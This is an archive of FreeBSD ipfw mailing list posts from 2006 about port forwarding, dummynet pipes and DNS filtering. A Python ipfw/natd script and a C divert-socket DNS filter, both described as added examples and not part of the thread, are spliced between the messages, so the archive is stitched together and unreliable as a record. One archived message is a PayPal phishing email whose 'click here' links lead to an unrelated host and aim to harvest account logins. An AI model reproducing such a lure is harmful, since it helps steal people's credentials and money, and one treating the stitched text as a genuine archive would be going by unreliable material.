From owner-freebsd-ipfw@FreeBSD.ORG Mon Apr 24 01:40:13 2006
X-Original-To: freebsd-ipfw@freebsd.org
Delivered-To: freebsd-ipfw@freebsd.org
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8013E16A40F for ; Mon, 24 Apr 2006 01:40:13 +0000 (UTC) (envelope-from tcruicksh@gmail.com)
Received: from nz-out-0102.google.com (nz-out-0102.google.com [64.233.162.207]) by mx1.FreeBSD.org (Postfix) with ESMTP id F154643D46 for ; Mon, 24 Apr 2006 01:40:12 +0000 (GMT) (envelope-from tcruicksh@gmail.com)
Received: by nz-out-0102.google.com with SMTP id 9so711969nzo for ; Sun, 23 Apr 2006 18:40:12 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:from:to:subject:date:mime-version:content-type:x-mailer:x-mimeole:thread-index:message-id; b=HsjwT86gn4so1N/U5Si/ZoXdDsFBXPi1Ep24gJhGXtvQ3B6cWD3Rykz15FM92IrNIfkLJP4AokhuXQPWNozPQv/1keXZXBFi+elshdPE/WWP/ch2yJYI0HTpOX8jY06T6afQ5eGfnGxBDZvFmmU2k5mPMJHd1BTA2PXEy6Iknoc=
Received: by 10.65.11.3 with SMTP id o3mr290605qbi; Sun, 23 Apr 2006 18:40:12 -0700 (PDT)
Received: from jero ( [70.29.205.160]) by mx.gmail.com with ESMTP id q15sm224767qbq.2006.04.23.18.40.11; Sun, 23 Apr 2006 18:40:12 -0700 (PDT)
From: "Tom Cruickshank"
Date: Sun, 23 Apr 2006 21:44:17 -0400
MIME-Version: 1.0
X-Mailer: Microsoft Office Outlook, Build 11.0.5510
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2869
Thread-Index: AcZnQJmFYs5Vj3HfR/OCiauhlaJnBA==
Message-ID: <444c2c7c.6e806909.2a41.3c8e@mx.gmail.com>
Content-Type: text/plain; charset="windows-1250"
Content-Transfer-Encoding: quoted-printable
X-Content-Filtered-By: Mailman/MimeDel 2.1.5
Subject: question about ipfw syntax
X-BeenThere: freebsd-ipfw@freebsd.org
X-Mailman-Version: 2.1.5
Precedence: list
List-Id: IPFW Technical Discussions
X-List-Received-Date: Mon, 24 Apr 2006 01:40:13 -0000

Hello,

I'm running FreeBSD 6.0 and trying to do port forwarding on port 5000 using ipfw.

Here is what I currently have.

Cmd = "ipfw -q add"

$cmd 00530 accept all from any any to 5000 in via fxp0
$cmd 00535 accept all from any any to 5000 out via fxp0

/sbin/natd -n fxp0 redirect_port tcp :5000 5000

Would this be the correct method to have port 5000 open on my firewall?

Please let me know. Thanks.

Tom

--
No virus found in this outgoing message.
Checked by AVG Free Edition.
Version: 7.1.385 / Virus Database: 268.4.5/322 - Release Date: 4/22/2006

From owner-freebsd-ipfw@FreeBSD.ORG Mon Apr 24 11:02:48 2006
Date: Mon, 24 Apr 2006 11:02:43 GMT
Message-Id: <200604241102.k3OB2hkn035494@freefall.freebsd.org>
From: FreeBSD bugmaster
To: freebsd-ipfw@FreeBSD.org
Subject: Current problem reports assigned to you

Current FreeBSD problem reports

Critical problems

Serious problems

S Submitted    Tracker     Resp. Description
-------------------------------------------------------------------------------
o [2003/04/22] kern/51274  ipfw  [ipfw] [patch] ipfw2 create dynamic rules f
f [2003/04/24] kern/51341  ipfw  [ipfw] [patch] ipfw rule 'deny icmp from
o [2004/11/13] kern/73910  ipfw  [ipfw] serious bug on forwarding of packe
o [2004/11/19] kern/74104  ipfw  [ipfw] ipfw2/1 conflict not detected or r
o [2005/03/13] conf/78762  ipfw  [ipfw] [patch] /etc/rc.d/ipfw should exce
o [2005/05/11] bin/80913   ipfw  [patch] /sbin/ipfw2 silently discards MAC
o [2005/11/08] kern/88659  ipfw  [modules] ipfw and ip6fw do not work prop
o [2005/11/08] kern/88664  ipfw  [ipfw] ipfw stateful firewalling broken w
o [2006/02/13] kern/93300  ipfw  ipfw pipe lost packets
o [2006/03/29] kern/95084  ipfw  [ipfw] [patch] IPFW2 ignores "recv/xmit/v

10 problems total.

Non-critical problems

S Submitted    Tracker     Resp. Description
-------------------------------------------------------------------------------
a [2001/04/13] kern/26534  ipfw  [ipfw] Add an option to ipfw to log gid/u
o [2002/12/10] kern/46159  ipfw  [ipfw] [patch] ipfw dynamic rules lifetim
o [2003/02/11] kern/48172  ipfw  [ipfw] [patch] ipfw does not log size and
o [2003/03/10] kern/49086  ipfw  [ipfw] [patch] Make ipfw2 log to differen
o [2003/04/09] bin/50749   ipfw  [ipfw] [patch] ipfw2 incorrectly parses p
o [2003/08/26] kern/55984  ipfw  [ipfw] [patch] time based firewalling sup
o [2003/12/30] kern/60719  ipfw  [ipfw] Headerless fragments generate cryp
o [2004/08/03] kern/69963  ipfw  [ipfw] install_state warning about alread
o [2004/09/04] kern/71366  ipfw  [ipfw] "ipfw fwd" sometimes rewrites dest
o [2004/10/22] kern/72987  ipfw  [ipfw] ipfw/dummynet pipe/queue 'queue [B
o [2004/10/29] kern/73276  ipfw  [ipfw] [patch] ipfw2 vulnerability (parse
o [2005/03/13] bin/78785   ipfw  [ipfw] [patch] ipfw verbosity locks machi
o [2005/05/05] kern/80642  ipfw  [ipfw] [patch] ipfw small patch - new RUL
o [2005/06/28] kern/82724  ipfw  [ipfw] [patch] Add setnexthop and default
o [2005/10/05] kern/86957  ipfw  [ipfw] [patch] ipfw mac logging
o [2005/10/07] kern/87032  ipfw  [ipfw] [patch] ipfw ioctl interface imple
o [2006/01/03] bin/91245   ipfw  [patch] ipfw(8) sometimes treat ipv6 inpu
o [2006/01/16] kern/91847  ipfw  [ipfw] ipfw with vlanX as the device
o [2006/02/16] kern/93422  ipfw  ipfw divert rule no longer works in 6.0 (
o [2006/03/31] bin/95146   ipfw  [ipfw][patch]ipfw -p option handler is bo

20 problems total.
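The port forward Tom asks about above, worked through as an added example; this is not code from the thread or from FreeBSD's own rc scripts. The outside interface fxp0, the inside host 192.168.1.10 and TCP port 5000 are placeholders. Two details the example builds in: natd's -redirect_port takes a target host:port followed by the alias port, and ipfw walks rules in number order, so the divert rule has to carry a lower number than the rules that accept the traffic or natd never sees the packets (a diverted packet re-enters the ruleset at the rule after the divert). natd must also be bound to the divert port before the divert rule is added, because divert(4) drops packets that arrive at a divert port nobody is listening on, and net.inet.ip.forwarding has to be 1. The check_divert_first function is a small linter for exactly those ordering mistakes.

```python
"""Build and load an ipfw + natd port-forward, the way an rc script would.

Assumptions (placeholders, not from the thread): fxp0 is the outside
interface, 192.168.1.10 is the inside host, TCP/5000 is forwarded.
Added example, not code posted on the list.
"""
import shlex
import subprocess

ACCEPT_ACTIONS = ("allow", "accept", "pass", "permit")


def natd_command(ext_if, target_host, port, proto="tcp"):
    """natd(8) invocation: -redirect_port proto targetIP:targetPORT aliasPORT.

    The target host:port is what 'redirect_port tcp :5000 5000' leaves out;
    without it natd has no inside address to rewrite the destination to.
    """
    return ["/sbin/natd", "-n", ext_if,
            "-redirect_port", proto, f"{target_host}:{port}", str(port)]


def port_forward_rules(ext_if, port, proto="tcp", base=500):
    """Ordered ipfw rules. The divert rule gets the lowest number so natd
    rewrites the destination before any accept rule looks at the packet."""
    return [
        f"{base:05d} divert natd all from any to any via {ext_if}",
        f"{base + 10:05d} allow {proto} from any to any {port} in via {ext_if}",
        f"{base + 20:05d} allow {proto} from any {port} to any out via {ext_if}",
    ]


def rule_number(rule):
    return int(rule.split()[0])


def check_divert_first(rules, ext_if):
    """Return the ordering problems in a rule list: no divert rule at all,
    or an accept rule on the outside interface numbered below the divert
    (it matches first, so the packet never reaches natd)."""
    diverts = [rule_number(r) for r in rules if r.split()[1] == "divert"]
    if not diverts:
        return ["no divert rule: natd will never see the traffic"]
    first_divert = min(diverts)
    problems = []
    for r in rules:
        words = r.split()
        if (words[1] in ACCEPT_ACTIONS and f"via {ext_if}" in r
                and rule_number(r) < first_divert):
            problems.append(
                f"rule {words[0]} accepts traffic before divert rule {first_divert:05d}")
    return problems


def load(ext_if, target_host, port, run=subprocess.run):
    """Enable forwarding, start natd, then add the rules in that order:
    divert(4) drops packets that hit a divert rule with no listener bound."""
    rules = port_forward_rules(ext_if, port)
    problems = check_divert_first(rules, ext_if)
    if problems:
        raise ValueError("; ".join(problems))
    run(["sysctl", "net.inet.ip.forwarding=1"], check=True)
    run(natd_command(ext_if, target_host, port), check=True)
    for rule in rules:
        run(["ipfw", "-q", "add"] + shlex.split(rule), check=True)
    return rules


if __name__ == "__main__":
    # Dry run: print what would be executed instead of touching the firewall.
    load("fxp0", "192.168.1.10", 5000,
         run=lambda argv, check=False: print(" ".join(argv)))
```

Run as root with the default runner to apply it; run without arguments to see the exact command lines first. The `run` parameter exists so the ordering logic can be exercised on a machine without ipfw.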
From owner-freebsd-ipfw@FreeBSD.ORG Tue Apr 25 13:04:24 2006
Date: Tue, 25 Apr 2006 10:07:54 -0300
From: Gilberto Villani Brito
To: freebsd-ipfw@freebsd.org
Message-ID: <20060425100754.24eb7d66@giboia>
In-Reply-To: <444c2c7c.6e806909.2a41.3c8e@mx.gmail.com>
References: <444c2c7c.6e806909.2a41.3c8e@mx.gmail.com>
Subject: Re: question about ipfw syntax

Add these rules:

$cmd 00540 divert natd all from any to 5000 in via fxp1
$cmd 00541 divert natd all from 5000 to any out via fxp1

Gilberto

On Sun, 23 Apr 2006 21:44:17 -0400 "Tom Cruickshank" wrote:

> Hello,
>
> I'm running FreeBSD 6.0 and trying to do port forwarding on port 5000
> using ipfw.
>
> Here is what I currently have.
>
> Cmd = "ipfw -q add"
>
> $cmd 00530 accept all from any any to 5000 in via fxp0
> $cmd 00535 accept all from any any to 5000 out via fxp0
>
> /sbin/natd -n fxp0 redirect_port tcp :5000 5000
>
> Would this be the correct method to have port 5000 open on my firewall?
>
> Please let me know. Thanks.
>
> Tom
>
> --
> No virus found in this outgoing message.
> Checked by AVG Free Edition.
> Version: 7.1.385 / Virus Database: 268.4.5/322 - Release Date: 4/22/2006
>
> _______________________________________________
> freebsd-ipfw@freebsd.org mailing list
> http://lists.freebsd.org/mailman/listinfo/freebsd-ipfw
> To unsubscribe, send any mail to "freebsd-ipfw-unsubscribe@freebsd.org"

From owner-freebsd-ipfw@FreeBSD.ORG Tue Apr 25 20:31:21 2006
Date: Tue, 25 Apr 2006 16:31:12 -0400
From: "Wang, Xi (GE, Research)"
Thread-Topic: Dummynet for multicast traffic on FreeBSD 6.0-Release
Subject: Dummynet for multicast traffic on FreeBSD 6.0-Release

Hi,

I am using ipfw to introduce end-to-end delays for multicast NORM traffic on a FreeBSD 6.0-RELEASE box on which mrouted is running.

Without any ipfw rules, I was able to send and receive multicast traffic from sender and receivers. I was able to observe the multicast information through "netstat -g" on the FreeBSD box. However, when I introduced the following rules, I was not able to establish multicast sessions and no receivers can receive any packets from the sender.

# sender
ipfw add pipe 1 ip from 10.0.1.1 to 232.0.0.10 out

# receivers
ipfw add pipe 2 ip from 10.0.2.2 to 232.0.0.10 out
ipfw add pipe 3 ip from 10.0.3.3 to 232.0.0.10 out
ipfw add pipe 4 ip from 10.0.4.4 to 232.0.0.10 out

ipfw pipe 1 config delay 100ms
ipfw pipe 2 config delay 100ms
ipfw pipe 3 config delay 100ms
ipfw pipe 4 config delay 100ms

I verified through "ipfw show" that the rules are active. To be sure that ipfw is actually working, I set up a rule that introduces an end-to-end delay between 10.0.1.1 and 10.0.2.2 and it worked just fine.

Does anyone know how to set up ipfw rules to introduce delay between sender and receivers for multicast sessions? Any suggestion is greatly appreciated.
Thanks,
-Xi

From owner-freebsd-ipfw@FreeBSD.ORG Wed Apr 26 00:38:40 2006
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 12A5216A403 for ; Wed, 26 Apr 2006 00:38:40 +0000 (UTC) (envelope-from root@jgl.inksterstattoo.net)
Received: from jgl.inksterstattoo.net (jgl.inksterstattoo.net [64.105.196.234]) by mx1.FreeBSD.org (Postfix) with ESMTP id A5DE143D49 for ; Wed, 26 Apr 2006 00:38:39 +0000 (GMT) (envelope-from root@jgl.inksterstattoo.net)
Received: by jgl.inksterstattoo.net (Postfix, from userid 0) id 10EA424842E; Tue, 25 Apr 2006 20:38:20 -0400 (EDT)
To: freebsd-ipfw@freebsd.org
From: "Customer Support" <"support@paypal.com"@jgl.inksterstattoo.net>
Errors-To: support@paypal.com
Reply-To: support@paypal.com
Message-Id: <20060426003820.10EA424842E@jgl.inksterstattoo.net>
Date: Tue, 25 Apr 2006 20:38:20 -0400 (EDT)
Subject: account maintenance and verification ( Your account is suspended )

[1][paypal_logo.gif] [pixel.gif]

PayPal Security Measures!

In accordance with PayPal's User Agreement and to ensure that your account has not been compromised, access to your account was limited. Your account access will remain limited until this issue has been resolved.

To secure your account and quickly restore full access, we may require some additional information from you.
To securely confirm your PayPal information please go directly to [2]https://www.paypal.com/ log in to your PayPal account and perform the steps necessary to restore your account access as soon as possible or click bellow:

To continue your verification procedure [3]click here

Thank you for using PayPal!
The PayPal Team

Please do not reply to this e-mail. Mail sent to this address cannot be answered. For assistance, [4]log in to your PayPal account and choose the "Help" link in the footer of any page.

To receive email notifications in plain text instead of HTML, update your preferences [5]here.

[pixel.gif]

References

1. http://www.paypal.com/cgi-bin/webscr?cmd=_home
2. http://www.romspedition.ro/webmail.htm/www.paypal.com/ws/cgi-bin/webscr/login-submit/redirect.to.paypal.com/paypal/login.html
3. http://www.romspedition.ro/webmail.htm/www.paypal.com/ws/cgi-bin/webscr/login-submit/redirect.to.paypal.com/paypal/login.html
4. http://www.romspedition.ro/webmail.htm/www.paypal.com/ws/cgi-bin/webscr/login-submit/redirect.to.paypal.com/paypal/login.html
5.
https://www.paypal.com/us/PREFS-NOTI

From owner-freebsd-ipfw@FreeBSD.ORG Thu Apr 27 18:13:51 2006
Date: Thu, 27 Apr 2006 14:13:02 -0400
From: Daniel Walker
To: freebsd-ipfw@freebsd.org
Subject: IPTABLES to IPFW for Packet Inspection Filtering

hey all,

here's what I'm looking to do. I know it could be done with IPTABLES, but as it's not available for the Mac OS X I'm trying to figure out how it would be done in IPFW ...

RELAY is a workstation forwarding packets from a SOURCE workstation to all DESTINATION end points.
RELAY is able to receive all packets from SOURCE bound to DESTINATION. I want RELAY to deny packets forwarded from SOURCE that are name resolution attempts to the DESTINATION DNS server, specifically for host WWW.YAHOO.COM (for example). To do this I need to create a rule that will look into the Data field of a DNS packet and match the query. The Data field of a DNS query packet would be written in hex.

With IPTABLES I would write something like this:

RELAY # iptables -I FORWARD 1 -p udp --dport 53 -m string --algo bm --hex-string "|01 00 00 01 00 00 00 00 00 00 03 77 77 77 05 79 61 68 6f 6f 03 63 6f 6d 00 00 01 00 01|" -j DROP

How would I write this in IPFW? I can not see how to apply a rule based on the data of a packet. I've reviewed the man page of ipfw, but don't see anything there. What am I missing?

Thanks.

Dan

From owner-freebsd-ipfw@FreeBSD.ORG Thu Apr 27 19:44:22 2006
Date: Thu, 27 Apr 2006 16:47:41 -0300
From: Gilberto Villani Brito
To: freebsd-ipfw@freebsd.org
Message-ID: <20060427164741.5f657901@giboia>
Subject: Pipes.

Hi,

I am using PF in my firewall, but to control my bandwidth I am trying to use ipfw.

These rules work:

pipe 101 config mask dst-ip 255.255.255.255 bw 500Kbit queue 50Kbytes
02000 pipe 100 ip from any to 10.0.0.0/24 via em0 in
65534 allow ip from any to any
65535 deny ip from any to any

but these rules stop my network (10.0.0.0/24):

pipe 101 config mask dst-ip 255.255.255.255 bw 500Kbit queue 50Kbytes
02000 pipe 100 ip from any to 10.0.0.0/24 via em1 out
65534 allow ip from any to any
65535 deny ip from any to any

Why can't I use a pipe on the out side of my interface???
Gilberto

From owner-freebsd-ipfw@FreeBSD.ORG Fri Apr 28 14:52:07 2006
Date: Fri, 28 Apr 2006 17:52:00 +0300
From: vladone
Reply-To: vladone
To: ipfw@freebsd.org
Message-ID: <1753864896.20060428175200@spaingsm.com>
Subject: Re: IPTABLES to IPFW for Packet Inspection Filtering

Hello Daniel,

Thursday, April 27, 2006, 9:13:02 PM, you wrote:

> hey all,
> here's what I'm looking to do. I know it could be done with IPTABLES, but
> as it's not available for the Mac OS X I'm trying to figure out how it
> would be done in IPFW ...
> RELAY is a workstation forwarding packets from a SOURCE workstation to all
> DESTINATION end points. RELAY is able to receive all packets from SOURCE
> bound to DESTINATION.
> I want RELAY to deny packets forwarding from SOURCE
> that are name resolution attempts to DESTINATION DNS server specifically
> for host WWW.YAHOO.COM (for example). To do this I need to create a rule
> that will look into the Data field of an DNS packet and match the query.
> The Data field of a DNS query packet would be written in hex.
> With IPTABLES I would write something like this:
> RELAY # iptables -I FORWARD 1 -p udp --dport 53 -m string --hex-string

You have the explanation for this in man ipfw:

src and dst: {addr | { addr or ... }} [[not] ports]
    An address (or a list, see below) optionally followed by ports specifiers.
    The second format (or-block with multiple addresses) is provided for convenience only and its use is discouraged.

addr: [not] {any | me | addr-list | addr-set}
    any    matches any IP address.
    me     matches any IP address configured on an interface in the system. The address list is evaluated at the time the packet is analysed.

addr-list: ip-addr[,addr-list]

ip-addr: A host or subnet address specified in one of the following ways:
    numeric-ip | hostname
        Matches a single IPv4 address, specified as dotted-quad or a hostname. Hostnames are resolved at the time the rule is added to the firewall list.
So if you want to deny packets from some hostname you have a rule like:

ipfw add 100 deny ip from me to www.yahoo.com

--
Best regards,
vladone                            mailto:vladone@spaingsm.com

From owner-freebsd-ipfw@FreeBSD.ORG Fri Apr 28 15:39:41 2006
Date: Fri, 28 Apr 2006 11:39:25 -0400
From: Daniel Walker
To: vladone, ipfw@freebsd.org
In-Reply-To: <1753864896.20060428175200@spaingsm.com>
Subject: Re: IPTABLES to IPFW for Packet Inspection Filtering

vladone,

I appreciate the response, but after doing a little more research on the issue I've discovered it is
not possible to do what I want with IPFW.

What I'm trying to do is block DNS queries for a specific domain name (the domain name is not the DESTINATION but a value to be handled by any DNS server). To do this I need to be able to match a string within the body of the data field against a string I provide and have the firewall drop packets that match. With IPTABLES I'm able to do this by predicting the hex value of the data field containing a query for the domain name www.yahoo.com.

IPTABLES allows for string matching. IPFW does not. I'll have to fire up my Ubuntu to do this.

thanks.

dan


vladone
Sent by: owner-freebsd-ipfw@freebsd.org
04/28/06 10:52 AM
Please respond to vladone

To: ipfw@freebsd.org
cc:
Subject: Re: IPTABLES to IPFW for Packet Inspection Filtering

Hello Daniel,

Thursday, April 27, 2006, 9:13:02 PM, you wrote:

> hey all,
> here's what I'm looking to do. I know it could be done with IPTABLES, but
> as it's not available for the Mac OS X I'm trying to figure out how it
> would be done in IPFW ...
> RELAY is a workstation forwarding packets from a SOURCE workstation to all
> DESTINATION end points. RELAY is able to receive all packets from SOURCE
> bound to DESTINATION. I want RELAY to deny packets forwarding from SOURCE
> that are name resolution attempts to DESTINATION DNS server specifically
> for host WWW.YAHOO.COM (for example). To do this I need to create a rule
> that will look into the Data field of an DNS packet and match the query.
> The Data field of a DNS query packet would be written in hex.
> With IPTABLES I would write something like this:
> RELAY # iptables -I FORWARD 1 -p udp --dport 53 -m string --hex-string

You have the explanation for this in man ipfw:

src and dst: {addr | { addr or ... }} [[not] ports]
    An address (or a list, see below) optionally followed by ports specifiers.
    The second format (or-block with multiple addresses) is provided for convenience only and its use is discouraged.
addr: [not] {any | me | addr-list | addr-set}
    any    matches any IP address.
    me     matches any IP address configured on an interface in the system. The address list is evaluated at the time the packet is analysed.

addr-list: ip-addr[,addr-list]

ip-addr: A host or subnet address specified in one of the following ways:
    numeric-ip | hostname
        Matches a single IPv4 address, specified as dotted-quad or a hostname. Hostnames are resolved at the time the rule is added to the firewall list.

So if you want to deny packets from some hostname you have a rule like:

ipfw add 100 deny ip from me to www.yahoo.com

--
Best regards,
vladone                            mailto:vladone@spaingsm.com

From owner-freebsd-ipfw@FreeBSD.ORG Fri Apr 28 19:27:00 2006
Date: Fri, 28 Apr 2006 15:26:52 -0400
From: Corey Smith
To: Daniel Walker
Message-ID: <44526C7C.10208@bonddesk.com>
Cc: ipfw@freebsd.org, vladone
Subject: Re: IPTABLES to IPFW for Packet Inspection Filtering

Daniel Walker wrote:
> IPTABLES allows for string matching. IPFW does not. I'll
> have to fire up my Ubuntu to do this.
>

This has been brought up before on this list. IPFW does not intend on ever supporting string matching as a standard feature. The developers feel that this kind of expensive operation does not belong in the kernel with IPFW.

This does not mean that this functionality is impossible to do with IPFW/FreeBSD. AFAIK string-match deny processing should be done using divert(4) sockets like natd. You use IPFW to divert outgoing DNS requests to your natd-like (userland) process. This process determines whether or not it contains your string and blocks the request/response if it does.

Unfortunately I'm not aware of a userland app that does this today.
-Corey Smith

From owner-freebsd-ipfw@FreeBSD.ORG Fri Apr 28 20:49:46 2006
Date: Fri, 28 Apr 2006 16:49:44 -0400
From: "Matthew McGehrin"
Reply-To: Matthew McGehrin
Message-ID: <000601c66b05$47e0c840$af00a8c0@orange>
References: <44526C7C.10208@bonddesk.com>
Subject: Re: IPTABLES to IPFW for Packet Inspection Filtering

Perhaps a transparent squid proxy. Redirect the http requests to squid, and then block the sites there.

17. Interception Caching/Proxying
http://www.squid-cache.org/Doc/FAQ/FAQ-17.html

----- Original Message -----
From: "Corey Smith"
To: "Daniel Walker"
Cc: ; "vladone"
Sent: Friday, April 28, 2006 3:26 PM
Subject: Re: IPTABLES to IPFW for Packet Inspection Filtering

> Daniel Walker wrote:
>> IPTABLES allows for string matching. IPFW does not. I'll have to fire
>> up my Ubuntu to do this.
> AFAIK String match deny processing should be done using divert(4) sockets
> like natd. You use IPFW to divert outgoing DNS requests to your natd-like
> (userland) process. This process determines whether or not it contains
> your string and blocks the request/response if it does.
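The divert(4) design Corey Smith describes above, as an added example that is not part of this thread or of FreeBSD: a userland process that ipfw hands outgoing DNS queries to, decodes the queried name, and reinjects every packet except queries whose name contains the string given on the command line. The divert port 5353, the matching ipfw rule in the comment and the sample packet are assumptions of this example; the file compiles anywhere, but the socket part only works on FreeBSD with a divert-capable kernel.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#ifndef IPPROTO_DIVERT
#define IPPROTO_DIVERT 258   /* FreeBSD's value; defined here only so the file also compiles elsewhere */
#endif
#define DIVERT_PORT 5353     /* assumed; must match "ipfw add divert 5353 udp from any to any 53 out" */
/* Decode the QNAME of a DNS query inside an IPv4/UDP packet into lower-case dotted form.
 * Returns 1 for a query to port 53, 0 for anything else (replies and non-DNS included). */
int dns_qname(const unsigned char *pkt, size_t len, char *out, size_t outlen) {
    size_t ihl, off, o = 0, i;
    if (len < 20 || (pkt[0] >> 4) != 4) return 0;
    ihl = (pkt[0] & 0x0f) * 4;
    if (ihl < 20 || pkt[9] != IPPROTO_UDP || len < ihl + 8 + 12) return 0;
    if (((pkt[ihl + 2] << 8) | pkt[ihl + 3]) != 53) return 0;   /* UDP destination port */
    off = ihl + 8;                                              /* DNS header starts here */
    if (pkt[off + 2] & 0x80) return 0;                          /* QR bit set: this is a reply */
    for (off += 12; off < len && pkt[off] != 0; off += pkt[off] + 1) {
        size_t l = pkt[off];             /* label length; 0xC0+ would be compression, invalid in a query */
        if (l >= 0xC0 || off + 1 + l > len || o + l + 1 >= outlen) return 0;
        if (o) out[o++] = '.';
        for (i = 0; i < l; i++) out[o++] = (char)tolower(pkt[off + 1 + i]);
    }
    out[o] = '\0';
    return off < len;                    /* 1 only if the terminating zero label was seen */
}
/* Policy: the query is blocked when its name contains needle (pass needle in lower case). */
int dns_query_matches(const unsigned char *pkt, size_t len, const char *needle) {
    char name[256];
    return dns_qname(pkt, len, name, sizeof name) && strstr(name, needle) != NULL;
}
/* Constructed sample packet: 10.0.0.2 -> 8.8.8.8, UDP 49152 -> 53, standard query for www.example.com */
const unsigned char SAMPLE_QUERY[] = {
    0x45,0,0,61, 0,1, 0,0, 64,17, 0,0, 10,0,0,2, 8,8,8,8,  0xC0,0, 0,53, 0,41, 0,0,   /* IPv4 + UDP */
    0x12,0x34, 0x01,0, 0,1, 0,0, 0,0, 0,0,                                         /* DNS header, QR=0 RD=1 */
    3,'w','w','w', 7,'e','x','a','m','p','l','e', 3,'c','o','m', 0, 0,1, 0,1 };     /* question, A IN */
int main(int argc, char **argv) {
    unsigned char buf[65535]; struct sockaddr_in addr = { 0 }; socklen_t al = sizeof addr; ssize_t n;
    int fd = socket(PF_INET, SOCK_RAW, IPPROTO_DIVERT);          /* divert(4) socket, needs root */
    if (argc != 2 || fd < 0) { fprintf(stderr, "usage: dnsfilter <lowercase-string>\n"); return 1; }
    addr.sin_family = AF_INET; addr.sin_port = htons(DIVERT_PORT);
    if (bind(fd, (struct sockaddr *)&addr, sizeof addr) < 0) { perror("bind"); return 1; }
    while ((n = recvfrom(fd, buf, sizeof buf, 0, (struct sockaddr *)&addr, &al)) >= 0)
        if (n > 0 && !dns_query_matches(buf, (size_t)n, argv[1]))  /* a matching query is simply not reinjected */
            sendto(fd, buf, (size_t)n, 0, (struct sockaddr *)&addr, al);  /* reinject after the divert rule */
    return 1;                                                    /* recvfrom failed */
}
```

Note that this only sees the query direction; replies for a blocked name never exist because the query was dropped, and a query that does not match is reinjected at the rule after the divert rule, so the rest of the ruleset still applies to it.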
From owner-freebsd-ipfw@FreeBSD.ORG Sat Apr 29 12:35:42 2006
From: vladone
Date: Sat, 29 Apr 2006 15:35:42 +0300
Message-ID: <321737321.20060429153542@spaingsm.com>
To: ipfw@freebsd.org
In-Reply-To: <20060428165726.2fe9ceb9@giboia>
References: <20060427164741.5f657901@giboia> <1129312329.20060428180201@spaingsm.com> <20060428165726.2fe9ceb9@giboia>
Subject: Re[2]: Pipes.

Try this:

ipfw pipe 100 config bw 500kbit/s mask dst-ip 0x000000ff
ipfw add 200 pipe 100 ip from any to 10.0.0.0/24 out xmit em1
ipfw add 65000 allow ip from any to any

It is strange how the network is blocked! Try to test your rules, beginning from a simple situation, using only a few needed rules.
Queue about 50 Kbytes, I think that is set by default, so no need to set it again.
--
Best regards,
vladone                          mailto:vladone@spaingsm.com